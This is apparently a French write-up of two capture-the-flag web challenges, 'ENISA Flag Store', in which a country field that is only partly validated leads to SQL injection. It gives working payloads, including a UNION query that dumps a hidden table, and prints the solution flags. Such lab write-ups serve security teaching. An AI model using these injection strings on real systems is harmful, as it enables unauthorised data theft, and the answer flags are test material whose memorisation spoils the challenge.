# ENISA Flag Store 1/2

## Énoncé

L'ENISA a décidé de mettre en place un nouveau service en ligne disponible à l'année pour les équipes qui participent à l'ECSC. Ce service permet aux joueurs des différentes équipes nationales de se créer des comptes individuels en utilisant des tokens secrets par pays. Une fois le compte créé, les joueurs peuvent voir les flags capturés dans différents CTF.

Les données personnelles des utilisateurs (mot de passe et pays) sont protégées dans la base de données, seuls les noms d'utilisateurs sont stockés en clair.

Le token pour la Team France est `ohnah7bairahPh5oon7naqu1caib8euh`.

Pour cette première épreuve, on vous met au défi d'aller voler un flag `FCSC{...}` à l'équipe suisse :-)

Notes :
- Les flags au format FAKE{...} que vous pourrez trouver ne sont pas à soumettre.
- Les comptes utilisateurs sont réinitialisés toutes les heures.

- [docker-compose.yml](https://hackropole.fr/challenges/fcsc2023-web-enisa-flag-store/docker-compose.public.yml)
- [enisa-flag-store.go](enisa-flag-store.go)

## Solution

On s'enregistre avec le token de la France. On voit nos flags.

![](web.png)

On lit le code source qui est fourni, et immédiatement, on trouve une injection SQL dans la fonction qui récupère les flags `getData(user User)`:
```go
    req := fmt.Sprintf(`SELECT ctf, challenge, flag, points
                        FROM flags WHERE country = '%s';`, user.Country);
```

En remontant l'arbre des appels, on voit que le `user` vient de la session, qui est chargée lors de la connexion
à partir de la base de données. Et évidemment, le `country` en base de données est celui que l'on a fourni à l'enregistrement. Mais
une tentative de s'enregistrer avec un `country` différent de France ne fonctionne pas, car il doit correspondre au `token` 
spécifique au pays. Creusons un peu plus cette vérification faite lors de l'enregistrement. D'abord `checkToken` est appelé :

```go
    stmt, err := db.Prepare(`SELECT id FROM country_tokens
                             WHERE country = SUBSTR($1, 1, 2)
                             AND token = encode(digest($2, 'sha1'), 'hex')`)
```

Ce qu'il est intéressant de remarquer, c'est que seuls les deux premiers caractères du pays sont utilisés pour cette vérification. Si
on continue de suivre la phase d'enregistrement, on arrive sur la fonction `RegisterLoginPassword` :

```go
    stmt, err = db.Prepare(`INSERT INTO users (username, password, country)
                            VALUES (
                                $1,
                                encode(digest($2, 'sha1'), 'hex'),
                                $3
                            )`)
    [...]
    _, err = stmt.Exec(username, password, country_enc)
```

Ici, c'est bien l'intégralité du pays qui est enregistré (sous forme chiffré, mais ce n'est pas important, il sera déchiffré à l'ouverture
de la session). Il nous faut donc une injection SQL dont les deux premiers caractères valent `fr` pour passer l'enregistrement, puis
l'injection sera déclenchée sur la récupération des flags. On sait que l'on cherche à voir les flags suisses, donc on s'enregistre avec le 
country `fr'or+country='ch`. L'enregistrement fonctionne, et dans la liste des flags on trouve :

![](win.png)

`FCSC{fad3a47d8ded28565aa2f68f6e2dbc37343881ba67fe39c5999a0102c387c34b}`


# ENISA Flag Store 2/2

## Énoncé

L'ENISA a décidé de mettre en place un nouveau service en ligne disponible à l'année pour les équipes qui participent à l'ECSC. Ce service permet aux joueurs des différentes équipes nationales de se créer des comptes individuels en utilisant des tokens secrets par pays. Une fois le compte créé, les joueurs peuvent voir les flags capturés dans différents CTF.

Le token pour la Team France est `ohnah7bairahPh5oon7naqu1caib8euh`.

Pour cette deuxième épreuve, on vous met au défi de trouver un autre flag stocké quelque part sur le système.

## Solution

On a donc un autre flag à trouver. Intuitivement, on peut supposer qu'il est en base de données également, mais probablement plus
profondément. Comme on va vite en avoir marre de créer un compte utilisateur à chaque tentative, [je code un script](SQLi.py) qui
va automatiser cette phase. Il prend en paramètre l'injection, et affiche le résultat.

Un point noté rapidement est que le champ pays va être limité en taille. Si on dépasse 192 caractères, on se prend l'erreur :
```go
    ErrFieldTooLong     = errors.New("Text fields are limited to 192 characters.")
```

Ça ne devrait pas nous empêcher de récupérer ce dont on a besoin, mais il va falloir être succinct.

On suit les techniques habituelles et on commence par lister les tables déclarées dans `INFORMATION_SCHEMA`. Pour cela on utilise
un `UNION` en respectant le nombre de champs en retour (4) et leurs types (3 chaînes et un entier). On supprime tous les espaces
que l'on peut, et on arrive à faire suffisamment court pour avoir le luxe d'ajouter un caractère à notre pays afin de ne pas 
récupérer les faux flags au milieu de nos résultats... :)

```console
$ ./SQLi.py "fr2'union select TABLE_NAME,'','',1from Information_schema.tables;--"
[...]
      <th scope="row">pg_ts_dict</th>
      <th scope="row">pg_event_trigger</th>
      <th scope="row">character_sets</th>
      <th scope="row">__s3cr4_t4bl3__</th>
      <th scope="row">pg_rewrite</th>
      <th scope="row">column_column_usage</th>
      <th scope="row">pg_stat_progress_analyze</th>
      <th scope="row">pg_opclass</th>
[...]
```

Discrètement, au milieu de ces résultats, on trouve une table `__s3cr4_t4bl3__`. Voyons son contenu :

```console
$ ./SQLi.py "fr2'union select *,'1','1',1 from __s3cr4_t4bl3__;--"  | grep row
[...]
      <th scope="row">FCSC{b505ad2ce3f07c4793fa7269c359736dfbd71286c88de11509a96a77616b35a0}</th>
[...]
```

C'est gagné !